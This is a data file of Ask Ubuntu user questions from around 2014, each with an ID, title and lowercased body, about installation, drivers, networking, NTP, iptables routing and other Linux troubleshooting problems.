519522	ca n't install ubuntu 12.04 32bits on a modern pc - so slow !	i 'm working on a project that only works on ubuntu 12.04 32 bits . i 've been given a modern computer to work with but the installation of ubuntu is driving me nuts . the machine specs are : mobo : gigabyte b85m-d3h cpu : intel i7 4770 ram : 32gb hd 1 : seagate barracuda 500gb hd 2 : kingston v300 120gb i know i should install the 64 bit version , but as i stated the project only works on 32 bits . the installation is really slow in both the first hd and the ssd , either using a dvd or from a usb stick . the media are correct ( checked using md5 ) . when it completes ( after more than one hour ) , the access to the hd is very slow , for instance when doing apt-get update it takes forever . curiously , i 've installed xubuntu 12.04 32 bits and it works ok , the installation is fast and everything ... why ?
519523	how to fix windows 8 statup and remove ubuntu 14.04	the dualboot is not working , so i want to get rid of ubuntu . i think the problem has something to do with uefi / legacy , but i have given up now and acceptet that ubuntu is still for it experts only . my problem is that if i startup in boot manager , it will not startup windows .
519525	vim clang_complete does not autocomplete header files	recently i tried to install youcompleteme vim autocomplete plugin , but i failed to make it work with my environment ( ubuntu 14.04 64 bit ) , because it kept bouncing `` -- user defined completion ( ^u^n^p ) pattern not found `` . ( http : //stackoverflow.com/questions/16872088/vim-clang-complete-user-defined-completion-unp-pattern-not-found ) . after giving up i tried another vim plugin clang_complete for autocompletion of my c++ code . but this time the plugin is unable to show different header files , the dot ( . ) operator completion is working properly . eg . when i type # include < , then no autocompleted header files list are shown . but vector v ; v. , shows the list of funtion in stl i.e push_back ( ) , erase ( ) etc . can anyone please help me .
519529	use of * in file searching	while reading about linux file searching i got the following ... to search for files using the * wildcard , replace the unknown string with * , e.g . if you remember only that the extension was .out , type ls *.out and when i tried the following command on system ( ubuntu 14.04 lts ) ..i got anupam @ jazz : ~ $ ls *.bash* ls : can not access *.bash* : no such file or directory anupam @ jazz : ~ $ ls .bash* .bash_history .bash_logout .bash_profile .bashrc anupam @ jazz : ~ $ in the first case why it is showing no such directory ( *.bash* ) and in next case its showing the files ( .bash* ) i am new to this flavor , and according to my automata theory classes ( * ) means any combination of strings including epsilon ( empty ) , ,so why the results are different in both the cases ... . ?
519530	no wireless after ugrade from 11.10 to 12.04	finally upgraded to 12.04 lts on a dell 630 latitude and the wireless stopped working after reboot . have tried to install sta , b43 even ndiswrapper in various ways due to crappy slow internet and it 's still not working . i 'm not very techy but i have installed a few ubuntu systems and got the wireless working in the past i know it 's got to be something simple i just cant see it . any help would be appreciated . lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 03:01.0 cardbus bridge : o2 micro , inc. cardbus bridge ( rev 21 ) 03:01.4 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) iw config nl80211 not found . sudo lshw -c network *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fe8fc000-fe8fffff *-network description : ethernet interface product : netxtreme bcm5755m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:1c:23:03:15 : c3 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=5755m-v3.29 ip=192.168.0.100 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : fe7f0000-fe7fffff lspci -vnn | grep network 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
519534	nis installs but is not in /etc/init.d	i am trying to install nis on a 32 bit ubuntu 14.04 version . i installed portmap and nis , and the system thinks they are ok : rjc @ slater : /etc/init.d $ sudo apt-get install portmap nis reading package lists ... done building dependency tree reading state information ... done note , selecting 'rpcbind ' instead of 'portmap' nis is already the newest version . rpcbind is already the newest version . 0 to upgrade , 0 to newly install , 0 to remove and 115 not to upgrade . after setting up config files ( e.g. , yp.config ) , i tried to start the nis service using : /etc/init.d/nis start but nis is not there : rjc @ slater : /etc/init.d $ ls -al /etc/init.d/nis ls : can not access /etc/init.d/nis : no such file or directory what step am i missing ?
519539	failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.15-0ubuntu10.6_i386.deb 404 not found [ ip : 91.189.91.14 80 ]	hi while executing the command at root - apt-get install alien i get below errors ( page not found ) can you please fix / help err http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libc-bin i386 2.15-0ubuntu10.6 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main libc-bin i386 2.15-0ubuntu10.6 404 not found [ ip : 91.189.91.14 80 ]
519544	ubuntu 14.04 doesn ' t boot after upgrade from 12.04 installed inside windows 8.1 clarification	i have ubuntu 12.04 installed like an app on windows 8.1 ( ubuntu 12.04 allow to be installed like an app in windows 8.1 and it can be removed when you do n't need it any more from control panel ) . usually , to chose what os to boot when you start the laptop , you can choose between windows 8.1 and ubuntu after windows logo appeared at start up and that was ok until i made this upgrade . now when i try to choose ubuntu the laptop try to boot it but , after that full colored screen is showed the screen go black and this messages appear : mount : mounting /dev/loop0/ on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem doesn ' t have requested /sbin/init no init found . try passing init = bootarg . busybox v1.21.1 ( ubuntu 1:1:21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) _ i have found solution in ubuntu 14.04 doesn ' t boot after upgrade from 12.04 installed inside windows 8.1 . i am able to boot my ubuntu machine . to have a permanent solution , it is suggested to change /boot/grub/grub.cfg from `` ro quiet splash '' `` rw quiet splash '' . but in /boot/grub/grub.cfg there are 4 line containing `` ro quiet splash '' . do i need to change all 4 or only 1 line and after changing do i need to run command sudo update-grub ? ? regards , amar
519546	low resolution problem with nvidia drivers ubuntu 12.04	i installed ubuntu 12.04.05 and updated it . after that i installed the drivers for my graphics card : sudo add-apt-repository ppa : xorg-edgers/ppa -y sudo apt-get update sudo apt-get install nvidia-current sudo apt-get install nvidia-current-settings sudo reboot unity starts fine , but the resolution is a bit low and when i open `` display '' i notice that i have only three resolutions available : 1280 x 1024 1024 x 768 800 x 600 i have installed ubuntu as dual boot and in win xp i have 1680 x 1050 , which is the resolution i would like to use in ubuntu as well . i followed these instructions but i only managed to mess up the display so badly that i had to reinstall everything . next i tried this : sudo nvidia-xconfiq but after reboot the only resolution left is 800 x 600 i looked for solutions and in lot of them xrandr-command is used , but when i try to use it i just get ca n't open display as a result . what should i do to make this command work ? one more strange thing : it says `` this driver is activated but not currently in use '' . what does this mean ? is this causing the low resolution ? if so , how could i fix it ? how could i change the resolution to 1680 x 1050 ? ? ? is this problem caused because i have no drivers for the monitor ? could it help if i tried another monitor ? the type of graphic card that i have is not very common , could that be the source of the problem ? i read from somewhere that xorg-edgers ppa should be uninstalled after installing the drivers , could this be causing all this ? my computer : intel d865perl , pentium 4 cpu ( 3 ghz ) , 3 gb ram , and nvidia quadro fx 500/600 graphics card . i have a harddrive with two partitions : one for the xp and one for ubuntu and it 's partitions . my monitor is asus p221w this is the first time i am using ubuntu or any other linux distribution . i have had some serious problems with this installation before , details can be found here and here . solution : i changed my graphics card to gf 6200 , reinstalled , and everythings works just fine , i got the right resolution without installing or updating any drivers .
519548	how to verify if java is correctly enabled in libre office	i am trying to use the java environnement in libre office . i installed an enabled in libre office the version 1.7.0_65 from oracle corporation . i then tried to use demos sheets from the obba files . some functions seems to work but for others i can see # nom ( # name in french ) . where does it come from ? do i have the right version ? the right installation ? is this just a stupid langage problem ? for exemples : =info.obba.obba.obcontrolpanelsetvisible ( d8 ) is ok ( `` wahr '' ) =info.obba.obba.obmake ( `` i '' , '' int '' , c17 ) returns # name ? ( for the langage , i tried : user interface , local setting : english ( usa ) , decimal separator : `` . `` , ignore system input langage : yes then no )
519549	in chromium `` 37.0.2062.94 ubuntu 14.04 ( 290621 ) '' window restore is delayed	i just ran apt-get update & & apt-get upgrade and chromium upgraded to `` 37.0.2062.94 ubuntu 14.04 ( 290621 ) '' . i am faced with a problem now , when i minimize chromium and then restore chromium window , it does n't show ( paint/redraw ) window immediately , it takes 5-10 seconds or more to show the content of window . i wonder it 's an upstream issue . i also tried it with metacity wm , the result is the same . do you have the same problem as me ? edit : i removed chromium folder in ~/.config/ nothing has changed . edit2 : i found a bug report similar to mine here
519550	why is the +8 timezone called gmt-8 in the filesystem ?	i am in +8 timezone，after my trying， i must `` ls -sf /etc/localtime /usr/share/zoneinfo/etc/gmt-8 '' ( not gmt+8 file ) , but after this setting , i can see the result of `` date -r '' is : `` wed , 03 sep 2014 18:07:34 +0800 '' , so i feel that i am correct , but why they use the really confusing name of gmt-8 ?
519551	gparted very slow and stucky comparing to other softwares	i know this is n't really an ubuntu-related question , but i do n't know when to ask . i always used gparted to manage my disk and partitions . i have a 2tb external hdd , wich was parted as well : sdb1 : 1000gib fat32 and sdb2 : 860 gib ntfs . i wanted to reduce sdb1 to 250gib and enlarge sdb2 to 1.57tib . so i launched gparted ( not in live mode , since it 's an external disk ) and started the operations . it got stuck ( window became grey ) . i knew it would have taken very long , and when i came back after 30 minutes it was still stuck , so i grep any fat32 and ntfs related process and there was nothing . killed it ( nothing happened to the partitions ) and relaunched the operations . it got stuck again . i tried then an windows software ( easeus partition manager ) , and it went well , taking less than 20 minutes . now the question : with gparted it would have taken hours , if it did n't stuck ( sdb2 was 90 % full ) . why is gparted so slow ? is it because it does it better or because of ubuntu ?
519553	ecryptfs on a nfs4 home	i am have been banging my head against a wall for days now trying to make this work . now i finally decided to get help . this actually concerns a debian server but ecryptfs is maintained by ubuntu devels and the official page some what points to askubuntu , so i think my chance to get help here is quite high . this is the part that works : nfs4 server secured with krb5i sso using kerberos/ldap mounting and using the nfs4 share is no problem as a normal user . root access is broken , but this is a known bug/feature . now to what i want to achieve : i want to have some sort of encrypted home directories on this nfs4-share . ecryptfs is my first choice because it features easy mount/unmount on login , without bothering the user to retype his pw . what i have tried so fare without any success : mount the nfs4 share to replace /home , then using ecryptfs-migrate-home fails . reasons : 1. no -- nopwcheck option , auth against kerberes/ldap fails 2. requires root access to /home on the nfs4-share , which is buggy , broken , what ever else . do the setup with ecryptfs-setup-private , then make it mount as /home/someuser manually . failed for some unknown reason , some problems with mounting . do the setup using ecryptfs-setup-private locally on the client machine . this worked , as long as i kept it local . then i rsynced the whole setup to the nfs4-share and mounting is broken again ( permissions and uid/gid where carefully preserved ) . does someone have any experience with this or any further ideas how i could get it working ? am i totally on the wrong track ? any help is highly appreciated . greetings paradoxon
519555	where is the output of a terminal ( gnome terminal ) stored	first of all , this is not a question about history , which stores all the entered commands . i have on my workstation at work several open terminals from which i launch simulations , examine the output and where occasionally error messages are displayed . in gnome terminal there is a setting controlling the length of the scroll back , in my case the setting is set to be just shy of 10000 lines . now my question : how can i search the scroll-back ? in my case i want to check whether a recent error message occurred previously . yes , i can scroll back and use my eyeballs to search for the error message in question . but for several terminals which are potentially up to 10000 lines long , that means a serious time spent scrolling . i assume the information in the scroll-back needs to be stored somewhere , and if is stored somewhere it might actually be searchable . [ edit : corrected the question to be about gnome terminal . ]
519557	ubuntu upgrade from virtualbox	i wish to know if i can hit the upgrade button on ubuntu installed in virtual box in order to update ubuntu .
519558	hot to make .xmodmap load automatically ?	one day gnome decided not to read .xmodmap by default . i have a .xmodmap file that works when executed manually ( xmodmap ~/.xmodmap ) . but wo n't load when starting a session in ubuntu gnome 14.04.1 64 bit . i have tried many solutions proposed in forums threads , but nothing worked so far . for what is worth , all i need is a single change : keycode 60 = period greater period greater periodcentered dead_caron thanks in advance .
519559	configure open stack in vmware using ubuntu desktop 12.04	iam student and now i work in my project , my scenario is to deploy open stack environment on it i need to configure two server and one client by using vmware 10 and ubuntu12.04 can any one guide me to order which one is first and which is after ? is it right way to begin to install vm then ubuntu and in it install open stack and on it install gust ubuntu server or what can i do , pls help me to order my opinions ?
519561	problem upgrading ubuntu 14.04 to 14.04.01	2 months ago i installed ubuntu 14.04. , but today the update manager showed me some recommended updates , one of these upgrade to 14.04.1 lts . after installations the pc restarted , but can not run ubuntu gui . only show the command line black screen and ask me my login and password . i do not know what to do to fix this problem , i tried to reinstall nvidia drivers , but it did not work . thanks for your time and support .
519563	fujitsu lifebook non responsive after last nights updates	good morning folks , every thing has been hunky dory on my life book running 14.04 64bit version . after last nights updates after the ubuntu splash screen the system locks up and i ca n't even get to ctrl alt f1 . the cursor isnt even blinking any ideas , quick google and i ca n't find anyone with same problem so far cheers in advance al
519564	how to enable discrete graphics card on ubuntu 14.04	i ca n't activate my gpu when running ubuntu 14.04 . i 've tried to follow the steps here but without any luck . http : //xpressrazor.wordpress.com/2013/10/08/enable-and-use-open-source-radeon-drivers-in-a-muxless-hybrid-graphics-intelamd-setup/ the output of cat /sys/kernel/debug/vgaswitcheroo/switch always return that my discrete card is in the dynoff state and i ca n't switch between them . $ cat /sys/kernel/debug/vgaswitcheroo/switch 0 : igd : + : pwr:0000:00:02.0 1 : dis : : dynoff:0000:01:00.0 also , as my card is not supported by ati so the installation of the proprietary drivers is not an option , at least as far as i 'm aware . $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] whistler [ radeon hd 6730m/6770m/7690m xt ] [ 1002:6740 ] ( rev ff ) $ xrandr -- listprovidersproviders : number : 1 provider 0 : id : 0x47 cap : 0x9 , source output , sink offload crtcs : 3 outputs : 5 associated providers : 0 name : intel is there any way to enable my discrete card ?
519566	vlc problems with vaapi	my system is ubuntu gnome 64 bit 14.04.1 . vaapi ( video acceleration api ) is installed and working fine . hardware is intel g3220 with integrated haswell hd video . problem is that when i enable vaapi acceleration in vlc , video becomes blurry for 1-2 seconds and then immeadiately clears up . that happens in almost every scene of the video ( doesn`t matter is h264 or mpeg ) . other problem is when i seek forward the video becomes choppy for 10-15 seconds , after it clears up . when i disable the vaapi backend everything is running fine . thanks in advance .
519567	how to use tor socks proxy for apt-get ?	i am running tor browser in my ubuntu 14.04 and and after successful connection i used socks proxy which is 127:0.0.1:9150 in my browser and it worked fine . but when i put acquire : :socks : :proxy `` socks : //127.0.0.1:9150/ '' ; in apt.conf it 's not working at all . how can i use apt-get with socks ? please help me . thank you .
519569	working with two internet connections	that 's my server network setup : /etc/network/interfaces auto ethlan iface ethlan inet static address 192.168.10.3 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 auto ethoi iface ethoi inet static address 10.1.1.3 netmask 255.255.255.0 network 10.1.1.0 broadcast 10.1.1.255 gateway 10.1.1.1 dns-nameservers 192.168.10.1 8.8.8.8 8.8.4.4 dns-search hsi.local auto ethgtc iface ethgtc inet static address x.y.z.82 netmask 255.255.255.192 network x.y.z.64 broadcast x.y.z.127 gateway x.y.z.65 and that 's my route table : 0.0.0.0 10.1.1.1 0.0.0.0 ug 0 0 0 ethoi 10.1.1.0 0.0.0.0 255.255.255.0 u 0 0 0 ethoi 10.8.0.0 10.8.0.2 255.255.255.0 ug 0 0 0 tun0 10.8.0.2 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 192.168.10.0 0.0.0.0 255.255.255.0 u 0 0 0 ethlan x.y.z.64 0.0.0.0 255.255.255.192 u 0 0 0 ethgtc the ethoi provides internet connection to lan clients and the ethgtc is used to external vpn , web and another services . i 'm using iptables to masquerade and firewall ( snapshot here ) . iptables -a input -i lo -j accept iptables -a input -m conntrack -- ctstate established , related -j accept iptables -t nat -a postrouting -o ethoi -j masquerade iptables -a input -i ethlan -j accept iptables -a input -i ethgtc -p tcp -- dport 80 -j accept ... other rules with this setup the lan clients could access the internet with the ethoi interface , but the services does n't work . however , if i change the default route to ethgtc all works fine except clients are routed by this interface and not ethoi . how to configure this scenario ?
519570	wubi installer usage on mac bootcamped partition running windows 8.1 os	currently my macbook-pro is dual boot system running osx mavericks and windows 8.1 ( windows is running on bootcamped partition ) i want to make it triple boot system , by adding ubuntu 14.04 . can i use wubi.exe from windows to install ubuntu and be successful to boot into all three os ? i am assuming that `` installing ubuntu using wubi '' changes the windows bootloader menu . or i need to do anything additional to make this work ?
519573	clean install of 14.04 gives endless `` wrong mac address ''	i booted my laptop with a usb with ubuntu 14.04 , and verified that 14.04 is working fine , and my internal drive is intact and working . then i hit install . the install program worked the first couple steps , but is now hanging forever on `` detecting file systems ... '' and the screen is printing over and over again the following : sep 3 11:38:08 ubuntu kernel : [ 10317.912522 ] error @ wl_cfg80211_get_station : wrong mac address this has been going on over an hour . a bit of history : previously i tried to upgrade from 12.04 to 14.04 , but in the middle of this upgrade i lost power . then tried to resume the upgrade using various methods unsuccessfully , finally deciding just to back up everything and do a clean install . this clean install is now hanging as above . any ideas what to do next ? thanks , stew
519574	getting `` failure : module initialization failed '' error	i have created a script file ( approximately 3-4 months before ) capturing the live audio and it worked fine we are able to capture the live audio and also can hear from the headphone . here is my script file # ! /bin/bash function set_live_audio { # get the sink name sink= $ ( pactl list short sinks | grep `` alsa_output '' | awk ' { print $ 2 } ' | head -n1 ) # get bluetooth sources pactl list short sources | grep `` bluez_source '' | awk ' { print $ 2 } ' | while read bluetooth_source do if [ ! `` $ ( pactl list short modules | grep source= $ { bluetooth_source } | head -n1 ) '' ] ; then index=`pactl load-module module-loopback source= $ { bluetooth_source } sink= $ { sink } latency_msec=1 source_dont_move=yes` fi done # get alsa sources pactl list short sources | grep `` alsa_input.usb '' | awk ' { print $ 2 } ' | while read alsa_source do echo $ alsa_source if [ ! `` $ ( pactl list short modules | grep source= $ { alsa_source } | head -n1 ) '' ] ; then index=`pactl load-module module-loopback source= $ { alsa_source } sink= $ { sink } latency_msec=1 source_dont_move=yes` fi done } while true ; do set_live_audio done today i again ran this hand , but i did n't catch any live audio . i get '' failure : module initialization failed '' error . i tried to resolve this error but no luck . here is my output of pactl list short sources command ( with bluetooth on ) 0 alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo module-alsa-card.c s16le 2ch 32000hz running 6 alsa_input.usb-046d_0823_4b709030-00-u0x46d0x823.analog-stereo module-alsa-card.c s16le 2ch 32000hz running 10 bluez_sink.00_1d_df_44_db_a6.monitor module-bluetooth-device.c s16le 1ch 8000hz running 11 bluez_source.00_1d_df_44_db_a6 module-bluetooth-device.c s16le 1ch 8000hz running so how can i resolve this error .
519576	java wont wont work	i cant get java to work.i have a young one who plays games on nick online and if i would have known java did n't work i would never have used it.ugh help.i followed all steps given but still nothing
519577	ubuntu 14.04 multi user rdp with active directory authentication	i have never tried this and hopefully i am missing some basic concept of vital piece of information , i have installed ubuntu 14.04 server and i have downloaded likewise to enable active directory authentication which is all working well - the last thing i need to do is enable remote access to about 20 people who are familiar with unity desktop environment - there seems to be no supported way of doing this for a 3d environment either on unity or gnome - i have seen some workarounds using xrdp and a 2d desktop environment 'xfce ' - while i got this to work it is not accepted as a solution - can anyone point me to a solution to enabling remote access with multi-user support and 3d desktop environment - i am open to any suggestion except team viewer or anything like it . edit : rdp will be initiated from windows 7 clients . many thanks , rob .
519578	backend for python3 module matplotlib	i 'm trying to use python3 to plot graphs . the only backend for matplotlib that seems to work is tkagg ( tkinter ) , however this looks like it has been designed in the stone age . so i was trying to find a replacement . as i 'm using unity which is based on gnome and which uses gtk i thought i would use those . however i ca n't get any of the following backends to work : gtkagg ( requires python ( 3 ) -gtk2 ) , gtk3agg ( gtk3agg backend is not known to work on python 3.x . ) , gtk3cairo ( no window opens ) and qt4agg ( requires qt4 which is not installed on my system ) . i have installed the following packages : python3 python3-matplotlib ipython3 python3-cairo python3-gi i have also tried installing python3-gtk2 but that returns this error : package python3-gtk2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source which i 'm guessing means i 'm not supposed to use it on ubuntu 14.04 lts . choosing gtk3cairo as a backend throws no errors and imports fine using ipython3 and pylabs , but it also does n't open a new window when i call the plot ( ) function . is there really nothing else that i can use besides tkinter ?
519579	how can i know battery is present or absent via script ?	i want to know which command should i use in my script to check the battery if it 's present or absent . like an if condition . thanks when i try with following command i get error . test @ test-pc : ~ $ cat /proc/acpi/battery/bat0/* cat : /proc/acpi/battery/bat0/* : no such file or directory test @ test-pc : ~ $ cat /sys/class/power_supply/bat0/status cat : /sys/class/power_supply/bat0/status : no such file or directory also acpi is already installed . i used dmesg | grep battery to check the battery and the result was this : [ 1.309638 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 1.309643 ] acpi : battery slot [ bat1 ] ( battery present ) the result of acpi -i is as following too : battery 0 : unknown , 79 % battery 0 : design capacity 8244 mah , last full capacity 6591 mah = 79 % and now how can i use this result in my script ?
519585	can i save a pgm file ( portable gray map ) somehow with inkscape ?	export only seems to export .png files , regardless what i put in the filename . if not , what else could i use to create such a file ?
519589	hide the unity launcher , when an application is maximized	i would like to hide the launcher only when an application goes maximized . this would be really useful when using my browser , because i could have that additional space . auto-hiding the launcher is n't good for me , since i want to use the launcher , just not when an application is maximized . ( ubuntu 14.04 )
519592	how do i make my laptop act as an ntp server in lan without connecting to the internet ?	i need to set my laptop as an ntp server within my own local area network . from what i notice , i am able to sync the client to my ntp server in a local area network only when a . ) there is an internet connection . b . ) when i tried to connect to another lan without internet access , i still managed to sync the computer . there are two lans that i connected to : 1 . ) 192.168.1.x subnet with internet 2 . ) 192.168.2.x subnet without internet here is the server . as you can see , when i tried restarting the service when i am connected to the lan without the internet , i failed to sync with the client . see , i failed to sync . however , if i am connected to the internet , all is well . how can i setup the ntp server such that even though i do not have any internet connection , my laptop can still act as an ntp server that my clients in the lan will be able to sync to ? ? i also included here what my /etc/ntp.conf as it may provide information about where i lack . # /etc/ntp.conf , configuration for ntpd ; see ntp.conf ( 5 ) for help driftfile /var/lib/ntp/ntp.drift # enable this if you want statistics to be logged . # statsdir /var/log/ntpstats/ statistics loopstats peerstats clockstats filegen loopstats file loopstats type day enable filegen peerstats file peerstats type day enable filegen clockstats file clockstats type day enable # specify one or more ntp servers . # use servers from the ntp pool project . approved by ubuntu technical board # on 2011-02-08 ( lp : # 104525 ) . see http : //www.pool.ntp.org/join.html for # more information . server 0.ubuntu.pool.ntp.org server 1.ubuntu.pool.ntp.org server 2.ubuntu.pool.ntp.org server 3.ubuntu.pool.ntp.org server 127.127.1.0 fudge 127.127.1.0 stratum 10 # use ubuntu 's ntp server as a fallback . server ntp.ubuntu.com # access control configuration ; see /usr/share/doc/ntp-doc/html/accopt.html for # details . the web page < http : //support.ntp.org/bin/view/support/accessrestrictions > # might also be helpful . # # note that `` restrict '' applies to both servers and clients , so a configuration # that might be intended to block requests from certain clients could also end # up blocking replies from your own upstream servers . # by default , exchange time with everybody , but do n't allow configuration . restrict -4 default kod notrap nomodify nopeer noquery restrict -6 default kod notrap nomodify nopeer noquery # local users may interrogate the ntp server more closely . restrict 127.0.0.1 restrict : :1 # clients from this ( example ! ) subnet have unlimited access , but only if # cryptographically authenticated . # restrict 192.168.123.0 mask 255.255.255.0 notrust # if you want to provide time to your local subnet , change the next line . # ( again , the address is an example only . ) # broadcast 192.168.1.255 # broadcast 192.168.2.255 # if you want to listen to time broadcasts on your local subnet , de-comment the # next lines . please do this only if you trust everybody on the network ! # disable auth # broadcastclient # allow lan machines to synchronize with this ntp server # restrict 192.168.1.0 mask 255.255.255.0 nomodify notrap # restrict 192.168.2.0 mask 255.255.255.0 nomodify notrap
519596	password required to logout ?	fresh install of xubuntu 14.04.1 32 bit . when i try to restart or shut down i am asked for a password in order to proceed . however when i provide a password it is not accepted . is there a setting that can be changed to stop the request for a password ? thanks in advance .
519598	ubuntu 14.04 no password box after waking up	opening the lid after suspension - the lock screen shows as normal except the lack of password box . when on dock , the user/password container & unity symbol swap between screens as mouse jumps between screens . i thought this was similar ubuntu 14.04 system freezes on wakeup from suspended state yesterday i noticed the calculator took a long time to open and respond , it 's also been a month or so between updates . any way to invoke something on lock screen , beat a hard boot ? i have a new toshiba z30 ultrabook
519599	need to get data from tables created in database from jsp and servlet	i want to retrieve data from table creatd in mysql database with the help of jsp and servlet .
519600	get notified on process close	we have a driver which keeps some objects on a per process basis . these objects need to be cleaned and freed when those processes close . is there a way to get notified ( in a kernel driver ) of those specific processes close ? thanks , serge
519601	show only installed network printers	since i updated to ubuntu 14.04 when trying to print something , the printer dialog shows all network printers . the list is very long , since i am on a university network . how can i make the printing dialog show only the printers i installed ?
519604	setting up lubuntu to access /usr/src/linux-headers-3.1.x.xx ?	i need to access a block of memory assigned by a fpga to a plx chip . now i dont think that will be to much of a problem accept when i try and use the /include/linux headers they seem to be somewhat lacking in capability a.k.a userspace header files . typically they will have less functions for instance /include/linux/pci.h will be only 100 lines or so . what packages to i have to install to be able to say in my header file # include so that it actually points to the `` pci.h '' in /usr/src/linux-headers-3.1.x.xx and not the one in /usr/include/linux ? i know that there`s all kinds of packages but frankly all the reading just made me confused and somewhat cautious as to which one to install . some of the ones ive been looking at will be something like . kernel-devel kernel-headers dkms why would i want to install anything else and will thsese actually work for me ? thanks and regards .
519607	accessing ubuntu-based vps from my ubuntu 14.04 lts pc	i just installed ubuntu 14.04 on my pc alongside windows 8.1 . my problem is , i want to connect to my ubuntu vps using my ubuntu pc but it 's not working . i tried ssh root @ vps-ip-add but nothing happens . is the command correct ? or do i need to install something ? thanks for the info . my vps is freshly-installed with ubuntu 12.04 . i am using a proxy to connect my pc to the internet .
519608	install another ubuntu os	so i have vista and lubuntu on 2 different hdds , and i want to install ubuntu studio alongside lubuntu . would there be any complications ?
519610	uefi : catch-22 on a acer aspire v5-531	i was trying to install ubuntu 14 ( 64-bit ) on a aspire v5-531 , preinstalled win 8 . in the bios i can flag : boot mode uefi , secure boot disable in this case the neither installation usb card nor cd rom start boot mode in legacy mode i can install ubuntu 14 , but grub does n't work ( yes , i used boot repair , but it doese n't work properly ) .
519617	a serious error in my ubuntu 14.04 lts ?	hi i am installing ubuntu 14.04 lts on my pc and it cannt update any more , this msg appears e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/sa.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en % % 5fus , e : the package lists or status file could not be parsed or opened . '' so anyone knows what 's the problem ?
519618	fail to copy anything from or into virtual machine	i have installed virtual machine to run windows in ubuntu 14.04 . everything is working fine except for the copy paste functionality . i am unable to copy any file from virtual machine to main screen and vice versa . neither the drag and drop function is working . kindly help
519622	synology nas connection problem	my synology nas is n't listed under the browse network in the file explorer ( or whatever it 's called in ubuntu ) . windows network is there but that 's not what i want . why is n't the synology nas listed too ? and is there a linux/ubuntu version of synology dsm ? i always thought there was , but searching for it , there does n't seem to be anything like it .
519626	lubuntu 14.04 internet connection very slow ( ethernet )	my internet connection is very slow . i have also windows xp installed and it does not have any problem . the pc is an hp pavilion t3320.it the ethernet adaptor is `` rtl8100 ''
519627	bootable cd for dell powweredge 2600	i´m trying to create an ubuntu server cd 32 bits but all images i get nor doesn´t fit on the cd nor are bootable . can anyone drive me to a link that really works ? thanks , henrique
